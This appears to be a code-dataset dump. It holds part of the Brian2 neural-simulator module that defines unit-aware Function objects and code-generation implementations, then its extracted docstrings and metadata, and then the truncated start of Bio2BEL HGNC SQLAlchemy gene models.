else:
arg_names = f.__code__.co_varnames[0:f.__code__.co_argcount]
argtypes = []
for name in arg_names:
arg_type = types.get(name, 'any')
if arg_type not in VALID_ARG_TYPES:
raise ValueError("Argument type %s is not valid, must be one of %s, "
"for argument %s" % (arg_type, VALID_ARG_TYPES, name))
argtypes.append(arg_type)
for n in types:
if n not in arg_names and n!='result':
raise ValueError("Type specified for unknown argument "+n)
return_type = types.get('result', 'float')
if return_type not in VALID_RETURN_TYPES:
raise ValueError("Result type %s is not valid, "
"must be one of %s" % (return_type, VALID_RETURN_TYPES))
f._arg_types = argtypes
f._return_type = return_type
f._orig_arg_names = arg_names
f._annotation_attributes = getattr(f, '_annotation_attributes', [])+['_arg_types', '_return_type']
return f
return annotate_function_with_types
class Function(object):
'''
An abstract specification of a function that can be used as part of
model equations, etc.
Parameters
----------
pyfunc : function
A Python function that is represented by this `Function` object.
sympy_func : `sympy.Function`, optional
A corresponding sympy function (if any). Allows functions to be
interpreted by sympy and potentially make simplifications. For example,
``sqrt(x**2)`` could be replaced by ``abs(x)``.
arg_units : list of `Unit`, optional
If `pyfunc` does not provide unit information (which typically means
that it was not annotated with a `check_units` decorator), the
units of the arguments have to specified explicitly using this
parameter.
return_unit : `Unit` or callable, optional
Same as for `arg_units`: if `pyfunc` does not provide unit information,
this information has to be provided explictly here. `return_unit` can
either be a specific `Unit`, if the function always returns the same
unit, or a function of the input units, e.g. a "square" function would
return the square of its input units, i.e. `return_unit` could be
specified as ``lambda u: u**2``.
arg_types : list of str, optional
Similar to `arg_units`, but gives the type of the argument rather than
its unit. In the current version of Brian arguments are specified
by one of the following strings: 'boolean', 'integer', 'float', 'any'.
If `arg_types` is not specified, 'any' will be assumed. In
future versions, a more refined specification may be possible. Note that
any argument with a type other than float should have no units. If
return_type : str, optional
Similar to `return_unit` and `arg_types`. In addition to 'boolean',
'integer' and 'float' you can also use 'highest' which will return the
highest type of its arguments. You can also give a function, as for
`return_unit`. If the return type is not specified, it is assumed to
be 'float'.
stateless : bool, optional
Whether this function does not have an internal state, i.e. if it
always returns the same output when called with the same arguments.
This is true for mathematical functions but not true for ``rand()``, for
example. Defaults to ``True``.
auto_vectorise : bool, optional
Whether the implementations of this function should get an additional
argument (not specified in abstract code) that can be used to determine
the number of values that should be returned (for the numpy target), or
an index potentially useful for generating deterministic values
independent of the order of vectorisation (for all other targets). The
main use case are random number functions, e.g. equations refer to
``rand()``, but the generate code will actually call
``rand(_vectorisation_idx)``. Defaults to ``False``.
Notes
-----
If a function should be usable for code generation targets other than
Python/numpy, implementations for these target languages have to be added
using the `~brian2.codegen.functions.implementation` decorator or using the
`~brian2.codegen.functions.add_implementations` function.
'''
def __init__(self, pyfunc, sympy_func=None,
arg_units=None, arg_names=None,
return_unit=None,
arg_types=None, return_type=None,
stateless=True, auto_vectorise=False):
self.pyfunc = pyfunc
self.sympy_func = sympy_func
self._arg_units = arg_units
self._arg_names = arg_names
self._return_unit = return_unit
if return_unit == bool:
self._returns_bool = True
else:
self._returns_bool = False
self._arg_types = arg_types
self._return_type = return_type
self.stateless = stateless
self.auto_vectorise = auto_vectorise
if self._arg_units is None:
if not hasattr(pyfunc, '_arg_units'):
raise ValueError(('The Python function "%s" does not specify '
'how it deals with units, need to specify '
'"arg_units" or use the "@check_units" '
'decorator.') % pyfunc.__name__)
elif pyfunc._arg_units is None:
# @check_units sets _arg_units to None if the units aren't
# specified for all of its arguments
raise ValueError(('The Python function "%s" does not specify '
'the units for all of its '
'arguments.') % pyfunc.__name__)
else:
self._arg_units = pyfunc._arg_units
else:
if any(isinstance(u, str) for u in self._arg_units):
if self._arg_names is None:
raise TypeError('Need to specify the names of the '
'arguments.')
if len(self._arg_names) != len(self._arg_units):
raise TypeError(f'arg_names and arg_units need to have the '
f'same length ({len(self._arg_names)} != '
f'({len(self._arg_units)})')
if self._return_unit is None:
if not hasattr(pyfunc, '_return_unit'):
raise ValueError(('The Python function "%s" does not specify '
'how it deals with units, need to specify '
'"return_unit" or use the "@check_units" '
'decorator.') % pyfunc.__name__)
elif pyfunc._return_unit is None:
# @check_units sets _return_unit to None if no "result=..."
# keyword is specified.
raise ValueError(('The Python function "%s" does not specify '
'the unit for its return '
'value.') % pyfunc.__name__)
else:
self._return_unit = pyfunc._return_unit
if self._arg_types is None:
if hasattr(pyfunc, '_arg_types'):
self._arg_types = pyfunc._arg_types
else:
self._arg_types = ['any']*len(self._arg_units)
if self._return_type is None:
self._return_type = getattr(pyfunc, '_return_type', 'float')
for argtype, u in zip(self._arg_types, self._arg_units):
if argtype!='float' and argtype!='any' and u is not None and not is_dimensionless(u):
raise TypeError("Non-float arguments must be dimensionless in function "+pyfunc.__name__)
if argtype not in VALID_ARG_TYPES:
raise ValueError("Argument type %s is not valid, must be one of %s, "
"in function %s" % (argtype, VALID_ARG_TYPES, pyfunc.__name__))
if self._return_type not in VALID_RETURN_TYPES:
raise ValueError("Return type %s is not valid, must be one of %s, "
"in function %s" % (self._return_type, VALID_RETURN_TYPES, pyfunc.__name__))
#: Stores implementations for this function in a
#: `FunctionImplementationContainer`
self.implementations = FunctionImplementationContainer(self)
def is_locally_constant(self, dt):
'''
Return whether this function (if interpreted as a function of time)
should be considered constant over a timestep. This is most importantly
used by `TimedArray` so that linear integration can be used. In its
standard implementation, always returns ``False``.
Parameters
----------
dt : float
The length of a timestep (without units).
Returns
-------
constant : bool
Whether the results of this function can be considered constant
over one timestep of length `dt`.
'''
return False
def __call__(self, *args):
return self.pyfunc(*args)
class FunctionImplementation(object):
'''
A simple container object for function implementations.
Parameters
----------
name : str, optional
The name of the function in the target language. Should only be
specified if the function has to be renamed for the target language.
code : language-dependent, optional
A language dependent argument specifying the implementation in the
target language, e.g. a code string or a dictionary of code strings.
namespace : dict-like, optional
A dictionary of mappings from names to values that should be added
to the namespace of a `CodeObject` using the function.
dependencies : dict-like, optional
A mapping of names to `Function` objects, for additional functions
needed by this function.
availability_check : callable, optional
A function that will be called to check whether the function should be
made available (e.g. depending on whether it is supported by the
compiler). The function should do nothing if the function is
available, or raise a ``NotImplementedError`` with a message
explaining why it isn't.
dynamic : bool, optional
Whether this `code`/`namespace` is dynamic, i.e. generated for each
new context it is used in. If set to ``True``, `code` and `namespace`
have to be callable with a `Group` as an argument and are expected
to return the final `code` and `namespace`. Defaults to ``False``.
'''
def __init__(self, name=None, code=None, namespace=None,
dependencies=None, availability_check=None,
dynamic=False, compiler_kwds=None):
if compiler_kwds is None:
compiler_kwds = {}
self.name = name
if dependencies is None:
dependencies = {}
self.dependencies = dependencies
self._code = code
self._namespace = namespace
self.dynamic = dynamic
self.compiler_kwds = compiler_kwds
self.availability_check = availability_check
def get_code(self, owner):
if self.availability_check is not None:
self.availability_check()
if self.dynamic:
return self._code(owner)
else:
return self._code
def get_namespace(self, owner):
if self.dynamic:
return self._namespace(owner)
else:
return self._namespace
class FunctionImplementationContainer(Mapping):
'''
Helper object to store implementations and give access in a dictionary-like
fashion, using `CodeGenerator` implementations as a fallback for `CodeObject`
implementations.
'''
def __init__(self, function):
self._function = function
self._implementations = dict()
def __getitem__(self, key):
'''
Find an implementation for this function that can be used by the
`CodeObject` given as `key`. Will find implementations registered
for `key` itself (or one of its parents), or for the `CodeGenerator`
class that `key` uses (or one of its parents). In all cases,
implementations registered for the corresponding names qualify as well.
Parameters
----------
key : `CodeObject`
The `CodeObject` that will use the `Function`
Returns
-------
implementation : `FunctionImplementation`
An implementation suitable for `key`.
'''
fallback = getattr(key, 'generator_class', None)
# in some cases we do the code generation with original_generator_class instead (e.g. GSL)
fallback_parent = getattr(key, 'original_generator_class', None)
for K in [key, fallback, fallback_parent]:
name = getattr(K, 'class_name',
'no class name for key')
for impl_key, impl in self._implementations.items():
impl_key_name = getattr(impl_key, 'class_name',
'no class name for implementation')
if ((impl_key_name is not None and impl_key_name in [K, name]) or
(impl_key is not None and impl_key in [K, name])):
return impl
if hasattr(K, '__bases__'):
for cls in inspect.getmro(K):
if cls in self._implementations:
return self._implementations[cls]
name = getattr(cls, 'class_name', None)
if name in self._implementations:
return self._implementations[name]
# Give a nicer error message if possible
if getattr(key, 'class_name', None) is not None:
key = key.class_name
elif getattr(fallback, 'class_name', None) is not None:
key = fallback.class_name
keys = ', '.join([getattr(k, 'class_name', str(k))
for k in self._implementations])
raise KeyError(('No implementation available for target {key}. '
'Available implementations: {keys}').format(key=key,
keys=keys))
def add_numpy_implementation(self, wrapped_func, dependencies=None,
discard_units=None, compiler_kwds=None):
'''
Add a numpy implementation to a `Function`.
Parameters
----------
function : `Function`
The function description for which an implementation should be added.
wrapped_func : callable
The original function (that will be used for the numpy implementation)
dependencies : list of `Function`, optional
A list of functions this function needs.
discard_units : bool, optional
See `implementation`.
'''
if discard_units is None:
discard_units = prefs['codegen.runtime.numpy.discard_units']
# Get the original function inside the check_units decorator
if hasattr(wrapped_func, '_orig_func'):
orig_func = wrapped_func._orig_func
else:
orig_func = wrapped_func
if discard_units:
new_globals = dict(orig_func.__globals__)
# strip away units in the function by changing its namespace
for key, value in new_globals.items():
if isinstance(value, Quantity):
new_globals[key] = np.asarray(value)
unitless_func = types.FunctionType(orig_func.__code__, new_globals,
orig_func.__name__,
orig_func.__defaults__,
orig_func.__closure__)
self._implementations['numpy'] = FunctionImplementation(name=None,
code=unitless_func,
dependencies=dependencies,
compiler_kwds=None)
else:
def wrapper_function(*args):
arg_units = list(self._function._arg_units)
if self._function.auto_vectorise:
arg_units += [DIMENSIONLESS]
if not len(args) == len(arg_units):
raise ValueError(('Function %s got %d arguments, '
'expected %d') % (self._function.pyfunc.__name__, len(args),
len(arg_units)))
new_args = []
for arg, arg_unit in zip(args, arg_units):
if arg_unit == bool or arg_unit is None or isinstance(arg_unit, str):
new_args.append(arg)
else:
new_args.append(Quantity.with_dimensions(arg,
get_dimensions(arg_unit)))
result = orig_func(*new_args)
if isinstance(self._function._return_unit, Callable):
return_unit = self._function._return_unit(*[get_dimensions(a)
for a in args])
else:
return_unit = self._function._return_unit
if return_unit == bool:
if not (isinstance(result, bool) or
np.asarray(result).dtype == bool):
raise TypeError('The function %s returned '
'%s, but it was expected '
'to return a boolean '
'value ' % (orig_func.__name__,
result))
elif (isinstance(return_unit, int) and return_unit == 1) or return_unit.dim is DIMENSIONLESS:
fail_for_dimension_mismatch(result,
return_unit,
'The function %s returned '
'{value}, but it was expected '
'to return a dimensionless '
'quantity' % orig_func.__name__,
value=result)
else:
fail_for_dimension_mismatch(result,
return_unit,
('The function %s returned '
'{value}, but it was expected '
'to return a quantity with '
'units %r') % (orig_func.__name__,
return_unit),
value=result)
return np.asarray(result)
self._implementations['numpy'] = FunctionImplementation(name=None,
code=wrapper_function,
dependencies=dependencies)
def add_implementation(self, target, code, namespace=None,
dependencies=None, availability_check=None,
name=None, compiler_kwds=None):
self._implementations[target] = FunctionImplementation(name=name,
code=code,
dependencies=dependencies,
availability_check=availability_check,
namespace=namespace,
compiler_kwds=compiler_kwds)
def add_dynamic_implementation(self, target, code, namespace=None,
dependencies=None, availability_check=None,
name=None, compiler_kwds=None):
'''
Adds an "dynamic implementation" for this function. `code` and `namespace`
arguments are expected to be callables that will be called in
`Network.before_run` with the owner of the `CodeObject` as an argument.
This allows to generate code that depends on details of the context it
is run in, e.g. the ``dt`` of a clock.
'''
if not callable(code):
raise TypeError('code argument has to be a callable, is type %s instead' % type(code))
if namespace is not None and not callable(namespace):
raise TypeError('namespace argument has to be a callable, is type %s instead' % type(code))
self._implementations[target] = FunctionImplementation(name=name,
code=code,
namespace=namespace,
dependencies=dependencies,
availability_check=availability_check,
dynamic=True,
compiler_kwds=compiler_kwds)
def __len__(self):
return len(self._implementations)
def __iter__(self):
return iter(self._implementations)
def implementation(target, code=None, namespace=None, dependencies=None,
discard_units=None, name=None, **compiler_kwds):
'''
A simple decorator to extend user-written Python functions to work with code
generation in other languages.
Parameters
----------
target : str
Name of the code generation target (e.g. ``'cython'``) for which to add
an implementation.
code : str or dict-like, optional
What kind of code the target language expects is language-specific,
e.g. C++ code allows for a dictionary of code blocks instead of a
single string.
namespaces : dict-like, optional
A namespace dictionary (i.e. a mapping of names to values) that
should be added to a `CodeObject` namespace when using this function.
dependencies : dict-like, optional
A mapping of names to `Function` objects, for additional functions
needed by this function.
discard_units: bool, optional
Numpy functions can internally make use of the unit system. However,
during a simulation run, state variables are passed around as unitless
values for efficiency. If `discard_units` is set to ``False``, input
arguments will have units added to them so that the function can still
use units internally (the units will be stripped away from the return
value as well). Alternatively, if `discard_units` is set to ``True``,
the function will receive unitless values as its input. The namespace
of the function will be altered to make references to units (e.g.
``ms``) refer to the corresponding floating point values so that no
unit mismatch errors are raised. Note that this system cannot work in
all cases, e.g. it does not work with functions that internally imports
values (e.g. does ``from brian2 import ms``) or access values with
units indirectly (e.g. uses ``brian2.ms`` instead of ``ms``). If no
value is given, defaults to the preference setting
`codegen.runtime.numpy.discard_units`.
name : str, optional
The name of the function in the target language. Should only be
specified if the function has to be renamed for the target language.
compiler_kwds : dict, optional
Additional keyword arguments will be transferred to the code generation
stage, e.g. for C++-based targets, the code can make use of additional
header files by providing a list of strings as the ``headers`` argument.
Notes
-----
While it is in principle possible to provide a numpy implementation
as an argument for this decorator, this is normally not necessary -- the
numpy implementation should be provided in the decorated function.
If this decorator is used with other decorators such as `check_units` or
`declare_types`, it should be the uppermost decorator (that is, the
last one to be applied).
Examples
--------
Sample usage::
@implementation('cpp',"""
#include<math.h>
inline double usersin(double x)
{
return sin(x);
}
""")
def usersin(x):
return sin(x)
'''
def do_user_implementation(func):
# Allow nesting of decorators
if isinstance(func, Function):
function = func
else:
function = Function(func)
if discard_units: # Add a numpy implementation that discards units
if not (target == 'numpy' and code is None):
raise TypeError(("'discard_units' can only be set for code "
"generation target 'numpy', without providing "
"any code."))
function.implementations.add_numpy_implementation(wrapped_func=func,
dependencies=dependencies,
discard_units=discard_units,
compiler_kwds=compiler_kwds)
else:
function.implementations.add_implementation(target, code=code,
dependencies=dependencies,
namespace=namespace,
name=name,
compiler_kwds=compiler_kwds)
# # copy any annotation attributes
# if hasattr(func, '_annotation_attributes'):
# for attrname in func._annotation_attributes:
# setattr(function, attrname, getattr(func, attrname))
# function._annotation_attributes = getattr(func, '_annotation_attributes', [])
return function
return do_user_implementation
class SymbolicConstant(Constant):
'''
Class for representing constants (e.g. pi) that are understood by sympy.
'''
def __init__(self, name, sympy_obj, value):
super(SymbolicConstant, self).__init__(name, value=value)
self.sympy_obj = sympy_obj
################################################################################
# Standard functions and constants
################################################################################
def _exprel(x):
if x.is_zero:
return S.One
else:
return (sympy.exp(x) - S.One)/x
class exprel(sympy_Function):
"""
Represents ``(exp(x) - 1)/x``.
The benefit of using ``exprel(x)`` over ``(exp(x) - 1)/x``
is that the latter is prone to cancellation under finite precision
arithmetic when x is close to zero, and cannot be evaluated when x is
equal to zero.
"""
nargs = 1
def fdiff(self, argindex=1):
"""
Returns the first derivative of this function.
"""
if argindex == 1:
return (sympy.exp(*self.args)*(self.args[0] - S.One) + S.One)/self.args[0]**2
else:
raise sympy.ArgumentIndexError(self, argindex)
def _eval_expand_func(self, **hints):
return _exprel(*self.args)
def _eval_rewrite_as_exp(self, arg, **kwargs):
if arg.is_zero:
return S.One
else:
return (sympy.exp(arg) - S.One)/arg
_eval_rewrite_as_tractable = _eval_rewrite_as_exp
@classmethod
def eval(cls, arg):
if arg is None:
return None
if arg.is_zero:
return S.One
exp_arg = sympy.exp.eval(arg)
if exp_arg is not None:
return (exp_arg - S.One)/arg
def _eval_is_real(self):
return self.args[0].is_real
def _eval_is_finite(self):
return self.args[0].is_finite
_infinity_int = 1073741823 # maximum 32bit integer divided by 2
def timestep(t, dt):
'''
Converts a given time to an integer time step. This function slightly shifts
the time before dividing it by ``dt`` to make sure that multiples of ``dt``
do not end up in the preceding time step due to floating point issues. This
function is used in the refractoriness calculation.
.. versionadded:: 2.1.3
Parameters
----------
t : np.ndarray, float, Quantity
The time to convert.
dt : float or Quantity
The length of a simulation time step.
Returns
-------
ts : np.ndarray, np.int64
The time step corresponding to the given time.
Notes
-----
This function cannot handle infinity values, use big values instead (e.g.
a `NeuronGroup` will use ``-1e4*second`` as the value of the ``lastspike``
variable for neurons that never spiked).
'''
elapsed_steps = np.array((t + 1e-3*dt)/dt, dtype=np.int64)
if elapsed_steps.shape == ():
elapsed_steps = elapsed_steps.item()
return elapsed_steps
DEFAULT_FUNCTIONS = {
# numpy functions that have the same name in numpy and math.h
'cos': Function(unitsafe.cos,
sympy_func=sympy.functions.elementary.trigonometric.cos),
'sin': Function(unitsafe.sin,
sympy_func=sympy.functions.elementary.trigonometric.sin),
'tan': Function(unitsafe.tan,
sympy_func=sympy.functions.elementary.trigonometric.tan),
'cosh': Function(unitsafe.cosh,
sympy_func=sympy.functions.elementary.hyperbolic.cosh),
'sinh': Function(unitsafe.sinh,
sympy_func=sympy.functions.elementary.hyperbolic.sinh),
'tanh': Function(unitsafe.tanh,
sympy_func=sympy.functions.elementary.hyperbolic.tanh),
'exp': Function(unitsafe.exp,
sympy_func=sympy.functions.elementary.exponential.exp),
'log': Function(unitsafe.log,
sympy_func=sympy.functions.elementary.exponential.log),
'log10': Function(unitsafe.log10,
sympy_func=sympy_cfunctions.log10),
'expm1': Function(unitsafe.expm1,
sympy_func=sympy_cfunctions.expm1),
'exprel': Function(unitsafe.exprel,
sympy_func=exprel),
'log1p': Function(unitsafe.log1p,
sympy_func=sympy_cfunctions.log1p),
'sqrt': Function(np.sqrt,
sympy_func=sympy.functions.elementary.miscellaneous.sqrt,
arg_units=[None], return_unit=lambda u: u**0.5),
'ceil': Function(np.ceil,
sympy_func=sympy.functions.elementary.integers.ceiling,
arg_units=[None], return_unit=lambda u: u),
'floor': Function(np.floor,
sympy_func=sympy.functions.elementary.integers.floor,
arg_units=[None], return_unit=lambda u: u),
# numpy functions that have a different name in numpy and math.h
'arccos': Function(unitsafe.arccos,
sympy_func=sympy.functions.elementary.trigonometric.acos),
'arcsin': Function(unitsafe.arcsin,
sympy_func=sympy.functions.elementary.trigonometric.asin),
'arctan': Function(unitsafe.arctan,
sympy_func=sympy.functions.elementary.trigonometric.atan),
'abs': Function(np.abs, return_type='highest',
sympy_func=sympy.functions.elementary.complexes.Abs,
arg_units=[None], return_unit=lambda u: u),
'sign': Function(pyfunc=np.sign, sympy_func=sympy.sign, return_type='highest',
arg_units=[None], return_unit=1),
# functions that need special treatment
'rand': Function(pyfunc=rand, arg_units=[], return_unit=1, stateless=False, auto_vectorise=True),
'randn': Function(pyfunc=randn, arg_units=[], return_unit=1, stateless=False, auto_vectorise=True),
'poisson': Function(pyfunc=np.random.poisson, arg_units=[1], return_unit=1, return_type='integer',
stateless=False, auto_vectorise=True),
'clip': Function(pyfunc=np.clip,
arg_units=[None, 'a', 'a'],
arg_names=['a', 'a_min', 'a_max'],
return_type='highest',
return_unit=lambda u1, u2, u3: u1),
'int': Function(pyfunc=np.int_, return_type='integer',
arg_units=[1], return_unit=1),
'timestep': Function(pyfunc=timestep, return_type='integer',
arg_units=[second, second], return_unit=1)
}
DEFAULT_CONSTANTS = {'pi': SymbolicConstant('pi', sympy.pi, value=np.pi),
'e': SymbolicConstant('e', sympy.E, value=np.e),
'inf': SymbolicConstant('inf', S.Infinity,
value=np.inf),
'-inf': SymbolicConstant('-inf', S.NegativeInfinity,
value=-np.inf)}
| brian2/core/functions.py | 35,780 | An abstract specification of a function that can be used as part of
model equations, etc.
Parameters
----------
pyfunc : function
A Python function that is represented by this `Function` object.
sympy_func : `sympy.Function`, optional
A corresponding sympy function (if any). Allows functions to be
interpreted by sympy and potentially make simplifications. For example,
``sqrt(x**2)`` could be replaced by ``abs(x)``.
arg_units : list of `Unit`, optional
If `pyfunc` does not provide unit information (which typically means
that it was not annotated with a `check_units` decorator), the
units of the arguments have to specified explicitly using this
parameter.
return_unit : `Unit` or callable, optional
Same as for `arg_units`: if `pyfunc` does not provide unit information,
this information has to be provided explictly here. `return_unit` can
either be a specific `Unit`, if the function always returns the same
unit, or a function of the input units, e.g. a "square" function would
return the square of its input units, i.e. `return_unit` could be
specified as ``lambda u: u**2``.
arg_types : list of str, optional
Similar to `arg_units`, but gives the type of the argument rather than
its unit. In the current version of Brian arguments are specified
by one of the following strings: 'boolean', 'integer', 'float', 'any'.
If `arg_types` is not specified, 'any' will be assumed. In
future versions, a more refined specification may be possible. Note that
any argument with a type other than float should have no units. If
return_type : str, optional
Similar to `return_unit` and `arg_types`. In addition to 'boolean',
'integer' and 'float' you can also use 'highest' which will return the
highest type of its arguments. You can also give a function, as for
`return_unit`. If the return type is not specified, it is assumed to
be 'float'.
stateless : bool, optional
Whether this function does not have an internal state, i.e. if it
always returns the same output when called with the same arguments.
This is true for mathematical functions but not true for ``rand()``, for
example. Defaults to ``True``.
auto_vectorise : bool, optional
Whether the implementations of this function should get an additional
argument (not specified in abstract code) that can be used to determine
the number of values that should be returned (for the numpy target), or
an index potentially useful for generating deterministic values
independent of the order of vectorisation (for all other targets). The
main use case are random number functions, e.g. equations refer to
``rand()``, but the generate code will actually call
``rand(_vectorisation_idx)``. Defaults to ``False``.
Notes
-----
If a function should be usable for code generation targets other than
Python/numpy, implementations for these target languages have to be added
using the `~brian2.codegen.functions.implementation` decorator or using the
`~brian2.codegen.functions.add_implementations` function.
A simple container object for function implementations.
Parameters
----------
name : str, optional
The name of the function in the target language. Should only be
specified if the function has to be renamed for the target language.
code : language-dependent, optional
A language dependent argument specifying the implementation in the
target language, e.g. a code string or a dictionary of code strings.
namespace : dict-like, optional
A dictionary of mappings from names to values that should be added
to the namespace of a `CodeObject` using the function.
dependencies : dict-like, optional
A mapping of names to `Function` objects, for additional functions
needed by this function.
availability_check : callable, optional
A function that will be called to check whether the function should be
made available (e.g. depending on whether it is supported by the
compiler). The function should do nothing if the function is
available, or raise a ``NotImplementedError`` with a message
explaining why it isn't.
dynamic : bool, optional
Whether this `code`/`namespace` is dynamic, i.e. generated for each
new context it is used in. If set to ``True``, `code` and `namespace`
have to be callable with a `Group` as an argument and are expected
to return the final `code` and `namespace`. Defaults to ``False``.
Helper object to store implementations and give access in a dictionary-like
fashion, using `CodeGenerator` implementations as a fallback for `CodeObject`
implementations.
Class for representing constants (e.g. pi) that are understood by sympy.
Represents ``(exp(x) - 1)/x``.
The benefit of using ``exprel(x)`` over ``(exp(x) - 1)/x``
is that the latter is prone to cancellation under finite precision
arithmetic when x is close to zero, and cannot be evaluated when x is
equal to zero.
Find an implementation for this function that can be used by the
`CodeObject` given as `key`. Will find implementations registered
for `key` itself (or one of its parents), or for the `CodeGenerator`
class that `key` uses (or one of its parents). In all cases,
implementations registered for the corresponding names qualify as well.
Parameters
----------
key : `CodeObject`
The `CodeObject` that will use the `Function`
Returns
-------
implementation : `FunctionImplementation`
An implementation suitable for `key`.
Adds an "dynamic implementation" for this function. `code` and `namespace`
arguments are expected to be callables that will be called in
`Network.before_run` with the owner of the `CodeObject` as an argument.
This allows to generate code that depends on details of the context it
is run in, e.g. the ``dt`` of a clock.
Add a numpy implementation to a `Function`.
Parameters
----------
function : `Function`
The function description for which an implementation should be added.
wrapped_func : callable
The original function (that will be used for the numpy implementation)
dependencies : list of `Function`, optional
A list of functions this function needs.
discard_units : bool, optional
See `implementation`.
Decorator to declare argument and result types for a function
Usage is similar to `check_units` except that types must be one of ``{VALID_ARG_TYPES}``
and the result type must be one of ``{VALID_RETURN_TYPES}``. Unspecified argument
types are assumed to be ``'all'`` (i.e. anything is permitted), and an unspecified
result type is assumed to be ``'float'``. Note that the ``'highest'`` option for
result type will give the highest type of its argument, e.g. if the arguments
were boolean and integer then the result would be integer, if the arguments were
integer and float it would be float.
Returns the first derivative of this function.
A simple decorator to extend user-written Python functions to work with code
generation in other languages.
Parameters
----------
target : str
Name of the code generation target (e.g. ``'cython'``) for which to add
an implementation.
code : str or dict-like, optional
What kind of code the target language expects is language-specific,
e.g. C++ code allows for a dictionary of code blocks instead of a
single string.
namespaces : dict-like, optional
A namespace dictionary (i.e. a mapping of names to values) that
should be added to a `CodeObject` namespace when using this function.
dependencies : dict-like, optional
A mapping of names to `Function` objects, for additional functions
needed by this function.
discard_units: bool, optional
Numpy functions can internally make use of the unit system. However,
during a simulation run, state variables are passed around as unitless
values for efficiency. If `discard_units` is set to ``False``, input
arguments will have units added to them so that the function can still
use units internally (the units will be stripped away from the return
value as well). Alternatively, if `discard_units` is set to ``True``,
the function will receive unitless values as its input. The namespace
of the function will be altered to make references to units (e.g.
``ms``) refer to the corresponding floating point values so that no
unit mismatch errors are raised. Note that this system cannot work in
all cases, e.g. it does not work with functions that internally imports
values (e.g. does ``from brian2 import ms``) or access values with
units indirectly (e.g. uses ``brian2.ms`` instead of ``ms``). If no
value is given, defaults to the preference setting
`codegen.runtime.numpy.discard_units`.
name : str, optional
The name of the function in the target language. Should only be
specified if the function has to be renamed for the target language.
compiler_kwds : dict, optional
Additional keyword arguments will be transferred to the code generation
stage, e.g. for C++-based targets, the code can make use of additional
header files by providing a list of strings as the ``headers`` argument.
Notes
-----
While it is in principle possible to provide a numpy implementation
as an argument for this decorator, this is normally not necessary -- the
numpy implementation should be provided in the decorated function.
If this decorator is used with other decorators such as `check_units` or
`declare_types`, it should be the uppermost decorator (that is, the
last one to be applied).
Examples
--------
Sample usage::
@implementation('cpp',"""
#include<math.h>
inline double usersin(double x)
{
return sin(x);
}
""")
def usersin(x):
return sin(x)
Return whether this function (if interpreted as a function of time)
should be considered constant over a timestep. This is most importantly
used by `TimedArray` so that linear integration can be used. In its
standard implementation, always returns ``False``.
Parameters
----------
dt : float
The length of a timestep (without units).
Returns
-------
constant : bool
Whether the results of this function can be considered constant
over one timestep of length `dt`.
Converts a given time to an integer time step. This function slightly shifts
the time before dividing it by ``dt`` to make sure that multiples of ``dt``
do not end up in the preceding time step due to floating point issues. This
function is used in the refractoriness calculation.
.. versionadded:: 2.1.3
Parameters
----------
t : np.ndarray, float, Quantity
The time to convert.
dt : float or Quantity
The length of a simulation time step.
Returns
-------
ts : np.ndarray, np.int64
The time step corresponding to the given time.
Notes
-----
This function cannot handle infinity values, use big values instead (e.g.
a `NeuronGroup` will use ``-1e4*second`` as the value of the ``lastspike``
variable for neurons that never spiked).
@check_units sets _arg_units to None if the units aren't specified for all of its arguments @check_units sets _return_unit to None if no "result=..." keyword is specified.: Stores implementations for this function in a: `FunctionImplementationContainer` in some cases we do the code generation with original_generator_class instead (e.g. GSL) Give a nicer error message if possible Get the original function inside the check_units decorator strip away units in the function by changing its namespace Allow nesting of decorators Add a numpy implementation that discards units copy any annotation attributes if hasattr(func, '_annotation_attributes'): for attrname in func._annotation_attributes: setattr(function, attrname, getattr(func, attrname)) function._annotation_attributes = getattr(func, '_annotation_attributes', []) Standard functions and constants maximum 32bit integer divided by 2 numpy functions that have the same name in numpy and math.h numpy functions that have a different name in numpy and math.h functions that need special treatment | 12,070 | en | 0.709796 |
# -*- coding: utf-8 -*-
"""SQLAlchemy models for Bio2BEL HGNC."""
from __future__ import annotations
from sqlalchemy import Column, ForeignKey, Integer, String, Table
from sqlalchemy.ext.declarative import DeclarativeMeta, declarative_base
from sqlalchemy.orm import relationship
from bio2bel.compath import CompathPathwayMixin, CompathProteinMixin
from .constants import MODULE_NAME
__all__ = [
'Base',
'GeneFamily',
'HumanGene',
'MouseGene',
'RatGene',
'human_mouse',
'human_rat',
]
HUMAN_GENE_TABLE_NAME = f'{MODULE_NAME}_humanGene'
HUMAN_RAT_TABLE_NAME = f'{MODULE_NAME}_humanGene_ratGene'
RAT_GENE_TABLE_NAME = f'{MODULE_NAME}_ratGene'
HUMAN_MOUSE_TABLE_NAME = f'{MODULE_NAME}_humanGene_mouseGene'
MOUSE_GENE_TABLE_NAME = f'{MODULE_NAME}_mouseGene'
GENE_FAMILY_TABLE_NAME = f'{MODULE_NAME}_geneFamily'
GENE_TO_FAMILY_TABLE_NAME = f'{MODULE_NAME}_humanGene_geneFamily'
Base: DeclarativeMeta = declarative_base()
human_mouse = Table(
HUMAN_MOUSE_TABLE_NAME,
Base.metadata,
Column('human_gene_id', Integer, ForeignKey(f'{HUMAN_GENE_TABLE_NAME}.id'), primary_key=True),
Column('mouse_gene_id', Integer, ForeignKey(f'{MOUSE_GENE_TABLE_NAME}.id'), primary_key=True),
)
human_rat = Table(
HUMAN_RAT_TABLE_NAME,
Base.metadata,
Column('human_gene_id', Integer, ForeignKey(f'{HUMAN_GENE_TABLE_NAME}.id'), primary_key=True),
Column('rat_gene_id', Integer, ForeignKey(f'{RAT_GENE_TABLE_NAME}.id'), primary_key=True),
)
human_family = Table(
GENE_TO_FAMILY_TABLE_NAME,
Base.metadata,
Column('human_gene_id', Integer, ForeignKey(f'{HUMAN_GENE_TABLE_NAME}.id'), primary_key=True),
Column('gene_family_id', Integer, ForeignKey(f'{GENE_FAMILY_TABLE_NAME}.id'), primary_key=True),
)
class HumanGene(Base, CompathProteinMixin):
"""A SQLAlchemy model for a human gene."""
__tablename__ = HUMAN_GENE_TABLE_NAME
id = Column(Integer, primary_key=True)
entrez_id = Column(String(255), doc='entrez id of the protein')
hgnc_id = Column(String(255), doc='HGNC id of the protein')
hgnc_symbol = Column(String(255), doc='HGN symbol of the protein')
class MouseGene(Base):
"""A SQLAlchemy model for a mouse gene."""
__tablename__ = MOUSE_GENE_TABLE_NAME
id = Column(Integer, primary_key=True)
entrez_id = Column(String(255), doc='entrez id of the protein')
mgi_id = Column(String(255), doc='MGI id of the protein')
mgi_symbol = Column(String(255), doc='MGI symbol of the protein')
human_genes = relationship(
HumanGene,
secondary=human_mouse,
backref='mouse_genes',
)
class RatGene(Base):
"""A SQLAlchemy model for an rat gene."""
